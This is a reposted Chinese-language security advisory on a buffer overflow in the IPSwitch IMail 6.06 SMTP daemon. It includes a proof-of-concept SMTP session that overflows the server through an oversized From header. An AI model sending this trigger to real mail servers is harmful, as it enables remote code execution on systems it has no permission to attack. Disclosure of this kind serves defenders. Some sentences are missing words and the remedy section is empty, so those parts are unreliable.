IMail SMTP 緩衝區溢位漏洞 (APP,缺陷) (轉)

IMail SMTP 緩衝區溢位漏洞 (APP,缺陷) (轉)[@more@]

I SMTP 緩衝區 (APP,缺陷)
 
涉及：
SMTP daemon
 
描述：
IMail SMTP 緩衝區溢位導致者程式碼漏洞
 
詳細：
IPSwitch IMail 是一個流行的電子伺服器，透過 介面為客戶提供郵件服務。並且 IMail 與大多數常見的電子郵
件相容，例如：SMTP, POP3, IMAP4, 等。今天發現它存在緩衝區溢位漏洞。問題在於 IMail SMTP 守護程式在處
理輸入資料時沒有進行正確的邊界檢查。攻擊者利用這點能使 IMail　SMTP 伺服器發生緩衝區溢位從而執行攻擊者提
供的程式碼。

以下程式碼僅僅用來測試和研究這個漏洞，如果您將其用於不正當的途徑請後果自負

為了重寫 EIP，必須知道有效的郵件列表名（附：讀者可向 索取郵件列表名，內容寫“list"　即
可）。將郵件列表名放入下列 SMTP 請求中，將能成功導致 IMail 服務緩衝區溢位。
Client SMTP Session -> IMAIL SMTP
----------------------------------------------------
helo eeyerulez
mailfrom: <>
rcpt to: valid_mailing_list
data
From: [buffer] example.
To: Whatever
wohooo!
.
quit
-----------------------------------------------------
Where [buffer] is 829 or so characters.

受影響：
IPSwitch's IMail 6.06 SMTP daemon
 
解決方案：
CNNS 建議您立即：
[ul] [/ul]